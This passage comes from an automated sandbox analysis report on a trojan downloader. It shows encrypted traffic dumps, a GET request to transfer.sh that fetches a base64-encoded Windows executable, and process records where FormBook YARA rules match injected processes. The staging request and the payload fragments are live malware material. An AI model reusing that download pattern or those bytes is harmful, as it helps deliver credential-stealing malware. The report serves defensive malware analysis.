                                                                                      Data Ascii: YJMvjlW5Ycd3veR/y0LExcydCgel1jdhsgH9BlQBQR6SU+M/thzylJoEVBKgT+1of+MPNEbskWY/CpaBWXXaqJ5EfkeklsSkX5gwK3SZ3WMb1R2a38gXuzRjtXm3si36J/CrgFkUV9CGcmY/D6FhOzv5bKbGYCwIfNvvxWXercBJZB2vk+ttQppca80NjeObxDTnXYZEtTtZk9/3ABR2MOTHRgcb7B68p5jYkNYYQHRHExGkE89xT0TwWZ50Ffs
                                                                                      2022-10-11 03:55:39 UTC80INData Raw: 68 45 31 32 34 43 79 6a 74 56 69 57 4c 6d 4d 72 57 55 68 36 79 36 2f 68 77 64 56 4d 71 6b 4f 5a 62 71 5a 7a 6d 45 4e 62 4e 48 4d 70 79 63 33 66 37 4c 66 49 71 32 59 68 78 33 39 73 7a 59 77 47 37 35 55 47 4c 67 59 38 52 2f 36 6b 39 74 70 57 49 42 4c 65 56 4b 39 6c 30 44 53 34 69 56 6b 68 38 6f 70 46 69 53 71 55 35 4b 43 2f 35 4a 33 74 68 52 6a 37 58 6f 2b 77 42 76 48 66 63 65 4d 7a 50 31 49 70 74 76 7a 74 4c 54 54 72 6f 4f 62 58 35 62 48 4f 2b 44 62 65 4e 76 44 4e 6f 44 73 58 66 44 79 5a 66 32 52 47 31 75 66 72 4f 38 73 5a 74 46 2f 70 57 61 63 4a 31 51 68 59 57 67 2b 71 4b 72 51 35 54 6b 75 52 76 53 72 33 50 68 57 76 38 58 4f 38 6c 79 6f 42 44 48 37 49 6f 73 6f 6f 37 55 6e 64 65 33 37 4a 31 68 4d 72 61 4f 77 78 2b 41 31 30 42 74 33 38 66 50 74 46 50 47 45
                                                                                      Data Ascii: hE124CyjtViWLmMrWUh6y6/hwdVMqkOZbqZzmENbNHMpyc3f7LfIq2Yhx39szYwG75UGLgY8R/6k9tpWIBLeVK9l0DS4iVkh8opFiSqU5KC/5J3thRj7Xo+wBvHfceMzP1IptvztLTTroObX5bHO+DbeNvDNoDsXfDyZf2RG1ufrO8sZtF/pWacJ1QhYWg+qKrQ5TkuRvSr3PhWv8XO8lyoBDH7Iosoo7Unde37J1hMraOwx+A10Bt38fPtFPGE
                                                                                      2022-10-11 03:55:39 UTC96INData Raw: 45 4e 47 76 31 49 6c 71 51 50 67 67 51 4f 58 34 72 63 38 67 61 51 2b 4b 61 65 56 56 52 41 50 39 73 48 45 44 73 36 45 46 53 35 31 5a 52 73 49 33 38 55 4d 66 6b 72 57 32 68 6b 30 65 62 46 74 4d 77 74 7a 76 69 69 58 38 43 74 6a 66 6d 63 64 57 56 50 65 44 4f 76 73 49 35 68 6f 4a 71 43 37 37 73 6d 46 2b 6e 47 47 30 56 78 50 44 33 32 79 38 54 7a 73 4f 76 76 72 46 48 57 62 71 6d 55 72 42 62 59 65 38 2b 79 79 37 35 54 7a 44 6f 73 6f 78 45 2f 31 2b 43 6f 62 37 32 62 71 45 49 54 37 76 7a 77 76 46 4f 52 56 58 77 36 56 44 43 45 79 56 63 4c 53 6e 43 37 69 72 4f 69 2b 58 2f 65 2b 33 59 53 31 76 39 69 45 45 5a 34 6b 42 58 65 47 32 6c 6d 30 74 52 62 6f 77 44 30 6e 34 6b 35 35 62 5a 6a 4d 4d 2f 45 2b 47 6b 79 67 6b 4b 73 6c 44 63 39 67 4d 32 33 71 6f 74 4f 61 38 68 54 54
                                                                                      Data Ascii: ENGv1IlqQPggQOX4rc8gaQ+KaeVVRAP9sHEDs6EFS51ZRsI38UMfkrW2hk0ebFtMwtzviiX8CtjfmcdWVPeDOvsI5hoJqC77smF+nGG0VxPD32y8TzsOvvrFHWbqmUrBbYe8+yy75TzDosoxE/1+Cob72bqEIT7vzwvFORVXw6VDCEyVcLSnC7irOi+X/e+3YS1v9iEEZ4kBXeG2lm0tRbowD0n4k55bZjMM/E+GkygkKslDc9gM23qotOa8hTT
                                                                                      2022-10-11 03:55:39 UTC112INData Raw: 6f 48 38 6c 6b 6c 4a 34 4a 43 67 2b 53 6c 72 4a 4b 4f 48 45 37 66 58 69 63 43 4c 4c 52 65 63 2b 77 30 4d 57 68 69 66 34 6e 63 37 6c 75 33 67 57 57 51 58 4d 6e 53 6e 38 66 45 30 75 31 2f 73 6b 63 41 50 62 6f 51 76 7a 47 30 41 55 4b 32 30 30 6f 58 77 6f 52 73 58 57 4d 62 41 35 51 34 35 7a 6a 37 59 49 52 6e 58 45 37 46 74 71 54 54 6b 64 66 6c 43 33 62 70 2f 4b 59 41 4d 54 35 6e 4b 53 49 4a 47 61 7a 45 6d 78 72 48 4f 2f 59 5a 4d 70 61 79 51 75 77 65 45 72 4e 67 47 74 30 4b 32 64 79 32 66 34 63 4f 73 47 46 5a 31 35 68 62 70 38 74 6e 52 77 50 37 46 4f 6a 69 49 36 46 75 34 41 31 7a 31 4b 72 39 35 4a 31 68 43 61 4d 6f 4b 6c 4b 6a 43 32 32 46 68 7a 72 6b 61 7a 63 6e 46 4a 70 77 56 30 6b 2b 43 33 2f 6b 36 72 51 66 53 4a 49 62 56 53 65 54 46 39 58 4b 51 54 6d 7a 45
                                                                                      Data Ascii: oH8lklJ4JCg+SlrJKOHE7fXicCLLRec+w0MWhif4nc7lu3gWWQXMnSn8fE0u1/skcAPboQvzG0AUK200oXwoRsXWMbA5Q45zj7YIRnXE7FtqTTkdflC3bp/KYAMT5nKSIJGazEmxrHO/YZMpayQuweErNgGt0K2dy2f4cOsGFZ15hbp8tnRwP7FOjiI6Fu4A1z1Kr95J1hCaMoKlKjC22FhzrkazcnFJpwV0k+C3/k6rQfSJIbVSeTF9XKQTmzE
                                                                                      2022-10-11 03:55:39 UTC128INData Raw: 36 36 41 54 35 48 58 67 64 38 77 44 65 47 7a 45 2b 6c 32 67 53 68 4e 79 58 72 76 67 72 72 34 4c 4f 7a 67 6d 56 4a 32 57 79 67 52 38 4f 56 37 57 61 49 67 6b 49 38 69 79 6c 57 77 67 54 56 36 61 4a 6f 63 71 68 64 39 75 39 38 42 66 4f 46 6f 54 53 39 43 78 38 6c 74 53 61 78 2f 44 35 46 36 67 45 58 4a 75 6a 74 77 4a 51 4f 72 2b 51 48 2b 59 73 44 45 34 6c 35 55 45 50 44 41 4a 61 30 2b 2b 6b 43 6e 68 77 73 38 58 48 32 6e 68 30 70 42 79 34 58 6e 4d 72 72 44 45 43 79 72 69 78 77 46 43 41 43 70 7a 59 2b 71 78 5a 57 65 30 4b 6d 4d 69 48 74 64 66 4a 4c 4b 36 43 76 6f 70 78 32 31 30 53 56 30 6a 47 36 55 73 47 30 48 54 6a 41 6e 38 44 2b 6a 41 45 75 67 4a 53 4c 78 64 42 78 37 55 48 4d 71 4f 4c 56 73 4b 70 54 78 39 32 48 6e 57 77 77 6c 65 59 5a 33 72 36 79 53 6e 4f 44 4b
                                                                                      Data Ascii: 66AT5HXgd8wDeGzE+l2gShNyXrvgrr4LOzgmVJ2WygR8OV7WaIgkI8iylWwgTV6aJocqhd9u98BfOFoTS9Cx8ltSax/D5F6gEXJujtwJQOr+QH+YsDE4l5UEPDAJa0++kCnhws8XH2nh0pBy4XnMrrDECyrixwFCACpzY+qxZWe0KmMiHtdfJLK6Cvopx210SV0jG6UsG0HTjAn8D+jAEugJSLxdBx7UHMqOLVsKpTx92HnWwwleYZ3r6ySnODK
                                                                                      2022-10-11 03:55:39 UTC144INData Raw: 38 4f 59 6e 4f 79 53 56 59 55 4e 2f 70 72 32 30 50 2f 71 77 52 53 6a 6d 53 77 70 35 67 4f 76 51 51 75 6c 45 4b 55 33 7a 41 31 6e 51 6e 35 4f 32 51 6d 75 37 4a 44 38 42 58 69 79 54 70 42 46 72 74 6d 2b 77 70 54 68 57 63 72 65 45 2b 79 59 66 5a 4b 69 72 75 58 73 4d 35 62 48 53 45 4b 62 6f 6d 6e 69 2b 2b 5a 2b 30 56 4c 58 41 68 31 4e 47 57 39 6e 47 6e 36 61 68 31 56 2f 47 39 48 65 49 78 6e 52 45 77 31 47 38 63 5a 4f 57 31 48 53 4d 30 37 38 65 56 2b 47 58 70 2f 68 57 38 50 67 69 44 7a 33 64 32 7a 34 69 35 38 53 71 42 43 43 2b 4c 46 6b 37 78 71 6d 77 76 74 47 6f 66 41 38 4b 38 73 33 33 57 79 32 53 4e 6c 66 5a 69 70 53 76 69 49 52 58 62 38 49 4b 49 2b 48 2b 52 65 6f 68 2b 6e 69 63 2b 6f 36 48 38 44 39 38 68 30 61 50 73 57 5a 32 35 74 33 34 66 5a 31 2b 75 6b 4d
                                                                                      Data Ascii: 8OYnOySVYUN/pr20P/qwRSjmSwp5gOvQQulEKU3zA1nQn5O2Qmu7JD8BXiyTpBFrtm+wpThWcreE+yYfZKiruXsM5bHSEKbomni++Z+0VLXAh1NGW9nGn6ah1V/G9HeIxnREw1G8cZOW1HSM078eV+GXp/hW8PgiDz3d2z4i58SqBCC+LFk7xqmwvtGofA8K8s33Wy2SNlfZipSviIRXb8IKI+H+Reoh+nic+o6H8D98h0aPsWZ25t34fZ1+ukM
                                                                                      2022-10-11 03:55:39 UTC160INData Raw: 69 6d 33 59 76 63 4f 4e 78 42 4c 6f 62 67 67 63 49 4e 64 7a 51 35 4d 42 52 53 52 4d 6d 41 38 4d 58 64 6c 65 46 7a 35 6d 4c 41 72 77 32 57 2f 49 62 39 34 78 63 6e 78 66 6a 4d 71 7a 79 32 66 6e 55 78 65 51 30 31 66 7a 62 56 6f 39 66 6a 6e 6e 75 47 74 6f 6e 76 7a 45 74 66 65 4b 39 53 4d 43 66 67 56 44 48 59 41 37 75 2b 59 65 50 42 4a 6c 35 6c 6c 44 76 51 53 6a 63 33 36 58 63 63 39 55 66 57 2b 62 4a 77 50 4c 78 65 6b 49 6a 6e 46 64 4c 37 59 49 6d 72 6c 36 57 6d 61 47 53 44 37 49 4c 53 43 41 4b 61 37 75 52 5a 50 66 33 58 6f 4c 75 2f 69 79 67 42 36 2b 34 58 4d 41 4e 6e 70 37 6b 58 47 4b 4a 49 6c 6a 72 45 6b 45 30 66 55 58 49 4a 35 34 67 4c 69 47 78 65 4f 36 34 75 72 64 45 51 54 32 69 58 71 68 43 36 76 61 36 67 57 54 58 43 48 6f 30 6b 47 4b 73 36 4a 68 30 33 72
                                                                                      Data Ascii: im3YvcONxBLobggcINdzQ5MBRSRMmA8MXdleFz5mLArw2W/Ib94xcnxfjMqzy2fnUxeQ01fzbVo9fjnnuGtonvzEtfeK9SMCfgVDHYA7u+YePBJl5llDvQSjc36Xcc9UfW+bJwPLxekIjnFdL7YImrl6WmaGSD7ILSCAKa7uRZPf3XoLu/iygB6+4XMANnp7kXGKJIljrEkE0fUXIJ54gLiGxeO64urdEQT2iXqhC6va6gWTXCHo0kGKs6Jh03r
                                                                                      2022-10-11 03:55:39 UTC176INData Raw: 62 59 46 5a 41 53 54 61 73 79 34 37 65 61 43 46 7a 6f 39 50 70 32 57 37 6a 34 64 54 49 2f 78 2b 70 72 38 45 35 75 4f 56 41 6f 4f 48 37 32 59 47 4c 70 49 2f 65 75 41 49 6e 44 34 53 64 4b 50 64 57 55 54 4f 71 66 4e 58 76 47 33 76 63 68 6b 2b 4e 49 78 7a 30 68 57 73 52 37 65 78 66 41 4c 5a 6b 79 2b 57 56 4f 42 46 4a 78 49 4c 34 34 61 54 7a 38 47 4c 64 4c 37 6c 74 4f 43 69 75 54 55 30 57 71 43 62 2f 53 6d 59 73 53 45 50 33 53 51 51 6d 5a 42 78 38 64 34 45 4c 52 43 48 56 59 52 6c 5a 42 44 7a 79 72 74 52 36 53 33 2f 7a 36 55 77 67 44 50 77 6b 69 75 74 69 47 74 62 58 75 7a 4b 4b 41 46 51 73 62 41 30 70 79 6f 4f 4f 55 71 74 53 70 74 4b 75 52 38 75 30 77 74 4e 64 66 68 2f 73 38 48 32 59 36 54 56 78 76 61 65 54 66 4b 38 76 6a 42 2f 57 62 31 31 50 51 65 57 64 51 69
                                                                                      Data Ascii: bYFZASTasy47eaCFzo9Pp2W7j4dTI/x+pr8E5uOVAoOH72YGLpI/euAInD4SdKPdWUTOqfNXvG3vchk+NIxz0hWsR7exfALZky+WVOBFJxIL44aTz8GLdL7ltOCiuTU0WqCb/SmYsSEP3SQQmZBx8d4ELRCHVYRlZBDzyrtR6S3/z6UwgDPwkiutiGtbXuzKKAFQsbA0pyoOOUqtSptKuR8u0wtNdfh/s8H2Y6TVxvaeTfK8vjB/Wb11PQeWdQi
                                                                                      2022-10-11 03:55:39 UTC192INData Raw: 41 6c 72 77 47 6d 6f 55 51 6f 63 58 73 79 34 70 61 56 6f 37 56 6f 57 54 75 41 76 2f 4a 54 53 73 58 48 45 36 51 49 4a 37 31 78 75 37 49 57 59 45 33 73 2f 39 64 42 62 38 5a 52 74 4f 59 66 2b 53 68 58 32 62 58 30 31 76 79 5a 63 64 72 39 49 31 69 6d 36 63 76 75 73 7a 56 61 64 53 45 74 44 79 41 58 66 2f 43 68 6d 67 79 36 66 57 6f 35 75 6e 34 5a 43 33 68 5a 4a 31 37 5a 65 70 68 56 58 43 4a 31 62 4b 32 35 6c 50 39 58 2b 46 4a 35 4e 55 5a 74 36 62 69 4b 36 70 68 64 2b 59 6c 34 6c 5a 57 32 37 59 43 4e 72 32 6d 75 79 6e 65 76 6d 53 4d 6e 50 73 38 4a 66 62 67 6c 58 32 42 56 50 67 46 36 2f 2b 2f 4d 77 32 65 69 72 39 6d 38 47 6b 6f 55 36 51 34 7a 72 64 45 50 30 45 2b 67 78 39 48 34 36 64 51 75 50 6e 41 34 6b 77 41 6e 6a 50 32 64 47 6f 30 47 2b 41 4e 4b 46 55 71 59 72
                                                                                      Data Ascii: AlrwGmoUQocXsy4paVo7VoWTuAv/JTSsXHE6QIJ71xu7IWYE3s/9dBb8ZRtOYf+ShX2bX01vyZcdr9I1im6cvuszVadSEtDyAXf/Chmgy6fWo5un4ZC3hZJ17ZephVXCJ1bK25lP9X+FJ5NUZt6biK6phd+Yl4lZW27YCNr2muynevmSMnPs8JfbglX2BVPgF6/+/Mw2eir9m8GkoU6Q4zrdEP0E+gx9H46dQuPnA4kwAnjP2dGo0G+ANKFUqYr
                                                                                      2022-10-11 03:55:39 UTC208INData Raw: 4d 51 54 4b 71 6b 6a 78 41 49 56 53 79 74 4c 62 57 54 4b 64 64 36 77 31 4d 36 7a 34 59 61 6d 42 50 6c 53 41 70 44 71 4e 69 76 55 66 55 6b 30 68 66 76 45 77 74 36 7a 58 6c 47 35 41 4d 4d 59 75 76 6a 58 64 44 31 72 37 49 4a 7a 4a 32 55 55 78 44 52 6e 64 4b 6a 36 52 6d 4a 63 54 70 70 56 52 77 53 48 63 35 4d 4c 55 6a 49 44 38 48 57 46 4d 6e 76 47 63 70 57 39 53 57 66 46 65 7a 77 31 74 35 44 48 53 44 53 68 53 7a 4b 6e 30 44 53 42 79 7a 42 46 32 54 57 2f 77 58 38 64 6a 41 37 30 65 49 39 73 64 4b 61 72 54 79 66 5a 38 74 4d 64 45 79 49 6c 62 61 70 50 70 70 43 38 64 76 6e 48 75 68 57 48 47 77 67 59 32 34 62 32 63 74 5a 7a 67 79 34 6c 61 69 55 78 6f 55 4a 5a 32 32 30 78 41 6e 65 31 56 70 42 56 63 42 38 65 76 58 30 32 72 45 2f 55 4c 32 61 62 4d 39 52 42 47 69 6d 7a
                                                                                      Data Ascii: MQTKqkjxAIVSytLbWTKdd6w1M6z4YamBPlSApDqNivUfUk0hfvEwt6zXlG5AMMYuvjXdD1r7IJzJ2UUxDRndKj6RmJcTppVRwSHc5MLUjID8HWFMnvGcpW9SWfFezw1t5DHSDShSzKn0DSByzBF2TW/wX8djA70eI9sdKarTyfZ8tMdEyIlbapPppC8dvnHuhWHGwgY24b2ctZzgy4laiUxoUJZ220xAne1VpBVcB8evX02rE/UL2abM9RBGimz
                                                                                      2022-10-11 03:55:39 UTC224INData Raw: 45 2b 65 39 49 46 6f 67 51 32 70 37 42 5a 30 69 53 71 51 64 61 6e 47 57 54 63 75 5a 74 59 2b 54 47 41 68 77 46 49 79 62 30 6b 51 6c 45 6b 67 55 65 41 4c 56 66 44 34 58 33 57 4a 35 63 4a 55 75 4c 35 51 65 66 51 38 6c 74 4e 77 69 31 48 72 31 52 65 66 48 66 57 6c 55 56 4a 32 43 47 30 31 51 61 65 5a 52 51 44 4d 6f 65 7a 66 55 68 63 45 4a 66 32 5a 33 6f 73 54 4f 68 45 69 67 69 50 78 44 33 4c 30 31 4d 55 4d 31 42 6e 7a 75 47 61 69 30 6d 6d 46 73 6d 33 6c 50 2b 75 41 73 6b 77 75 4a 33 6f 66 66 41 30 43 30 61 2f 59 6d 2b 69 66 4e 61 77 2f 35 6f 4a 65 7a 77 5a 47 59 64 6c 70 44 7a 52 43 75 71 72 7a 6f 64 47 50 6f 32 48 53 65 47 6f 47 68 76 5a 6a 4e 31 65 75 64 68 6f 45 37 46 37 46 73 4d 74 65 61 77 7a 38 4d 57 42 50 4b 6a 63 4d 59 44 70 41 4f 59 71 44 69 41 6f 4c
                                                                                      Data Ascii: E+e9IFogQ2p7BZ0iSqQdanGWTcuZtY+TGAhwFIyb0kQlEkgUeALVfD4X3WJ5cJUuL5QefQ8ltNwi1Hr1RefHfWlUVJ2CG01QaeZRQDMoezfUhcEJf2Z3osTOhEigiPxD3L01MUM1BnzuGai0mmFsm3lP+uAskwuJ3offA0C0a/Ym+ifNaw/5oJezwZGYdlpDzRCuqrzodGPo2HSeGoGhvZjN1eudhoE7F7FsMteawz8MWBPKjcMYDpAOYqDiAoL
                                                                                      2022-10-11 03:55:39 UTC240INData Raw: 76 5a 69 72 5a 6c 53 73 55 41 73 72 66 74 66 46 35 63 39 39 43 67 46 61 68 48 67 64 6d 36 4b 4f 5a 44 37 67 36 4c 70 57 69 4b 41 57 70 4f 6b 64 6b 4d 6d 31 4a 6c 52 31 52 71 6f 6b 66 45 32 64 70 6f 44 36 45 41 4b 64 6b 44 56 36 74 5a 70 73 41 56 57 2f 45 33 56 34 57 51 56 62 34 49 43 36 37 53 42 70 43 38 36 45 33 6b 62 61 30 44 43 7a 53 75 73 4f 73 38 30 6c 70 32 75 4e 43 6f 74 54 43 59 4c 6d 63 31 36 4a 66 39 34 43 72 4e 45 42 36 2f 2b 6b 30 75 51 33 48 30 68 68 66 58 56 5a 50 35 45 68 50 73 32 51 6a 2b 45 58 4c 64 75 73 6d 53 2b 77 33 56 42 42 77 50 47 36 69 61 39 53 4e 43 6e 42 59 70 7a 43 73 77 6f 76 4d 44 6c 6b 42 75 64 56 69 35 61 6a 7a 69 74 66 4f 6f 64 61 36 69 4b 41 70 31 63 50 57 49 43 48 33 4c 4e 48 35 64 35 4c 39 67 39 46 43 35 6e 47 4c 61 64
                                                                                      Data Ascii: vZirZlSsUAsrftfF5c99CgFahHgdm6KOZD7g6LpWiKAWpOkdkMm1JlR1RqokfE2dpoD6EAKdkDV6tZpsAVW/E3V4WQVb4IC67SBpC86E3kba0DCzSusOs80lp2uNCotTCYLmc16Jf94CrNEB6/+k0uQ3H0hhfXVZP5EhPs2Qj+EXLdusmS+w3VBBwPG6ia9SNCnBYpzCswovMDlkBudVi5ajzitfOoda6iKAp1cPWICH3LNH5d5L9g9FC5nGLad


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.449700144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2022-10-11 03:55:39 UTC248OUTGET /get/NNwCGT/DLL.txt HTTP/1.1
                                                                                      Host: transfer.sh
                                                                                      2022-10-11 03:55:40 UTC248INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Tue, 11 Oct 2022 03:55:40 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 28672
                                                                                      Connection: close
                                                                                      Cache-Control: no-store
                                                                                      Content-Disposition: attachment; filename="DLL.txt"
                                                                                      Retry-After: Tue, 11 Oct 2022 05:55:45 GMT
                                                                                      X-Made-With: <3 by DutchCoders
                                                                                      X-Ratelimit-Key: 127.0.0.1,102.129.143.15,102.129.143.15
                                                                                      X-Ratelimit-Limit: 10
                                                                                      X-Ratelimit-Rate: 600
                                                                                      X-Ratelimit-Remaining: 9
                                                                                      X-Ratelimit-Reset: 1665460545
                                                                                      X-Remaining-Days: n/a
                                                                                      X-Remaining-Downloads: n/a
                                                                                      X-Served-By: Proudly served by DutchCoders
                                                                                      Strict-Transport-Security: max-age=63072000
                                                                                      2022-10-11 03:55:40 UTC248INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 64 52 47 4d 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 51 59 41 41 45 77 41 41 41 42 51 41 41 41 41 41 41 41 41 34 6d 73 41 41 41 41 67 41 41 41 41 67 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                      Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOdRGMAAAAAAAAAAOAADiELAQYAAEwAAABQAAAAAAAA4msAAAAgAAAAgAAAAABAAAAgAAAAAgA
                                                                                      2022-10-11 03:55:40 UTC264INData Raw: 41 51 48 4b 46 4b 55 44 41 51 48 39 46 4a 59 44 30 51 45 4b 46 62 49 44 30 51 45 53 46 62 63 44 30 51 46 5a 46 4c 30 44 41 51 45 63 46 63 34 44 30 51 45 31 46 64 4d 44 36 51 46 42 46 65 51 44 57 51 48 6b 42 2b 6f 44 61 51 42 4f 46 66 63 44 59 51 44 6b 42 34 4d 41 63 51 42 62 46 51 73 45 32 51 46 73 46 52 45 45 32 51 46 31 46 52 63 45 49 51 42 2f 46 52 38 45 49 51 43 48 46 53 59 45 49 51 43 51 46 53 30 45 30 51 47 5a 46 5a 34 41 32 51 47 66 46 52 45 45 30 51 47 72 46 54 30 45 36 51 44 6b 42 79 38 43 30 51 45 4b 46 55 30 45 30 51 47 79 46 56 49 45 79 51 43 38 46 56 63 45 49 51 42 48 46 46 34 45 45 51 44 43 46 57 51 45 34 51 48 4b 46 58 6b 41 34 51 48 51 46 58 6b 41 38 51 44 56 46 61 41 45 71 51 48 6b 42 34 4d 41 38 51 44 65 46 61 51 45 75 51 48 6a 46 61 77
                                                                                      Data Ascii: AQHKFKUDAQH9FJYD0QEKFbID0QESFbcD0QFZFL0DAQEcFc4D0QE1FdMD6QFBFeQDWQHkB+oDaQBOFfcDYQDkB4MAcQBbFQsE2QFsFREE2QF1FRcEIQB/FR8EIQCHFSYEIQCQFS0E0QGZFZ4A2QGfFREE0QGrFT0E6QDkBy8C0QEKFU0E0QGyFVIEyQC8FVcEIQBHFF4EEQDCFWQE4QHKFXkA4QHQFXkA8QDVFaAEqQHkB4MA8QDeFaQEuQHjFaw


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:05:55:37
                                                                                      Start date:11/10/2022
                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe
                                                                                      Imagebase:0x150000
                                                                                      File size:74592 bytes
                                                                                      MD5 hash:3E26DD2EF6DC0BE5838E1EAC6B668846
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:05:55:40
                                                                                      Start date:11/10/2022
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                      Imagebase:0x760000
                                                                                      File size:55400 bytes
                                                                                      MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.399292071.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.399924782.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:05:55:42
                                                                                      Start date:11/10/2022
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff618f60000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.365503115.000000000E427000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:high

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:05:56:19
                                                                                      Start date:11/10/2022
                                                                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                      Imagebase:0x1040000
                                                                                      File size:78848 bytes
                                                                                      MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.571202230.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
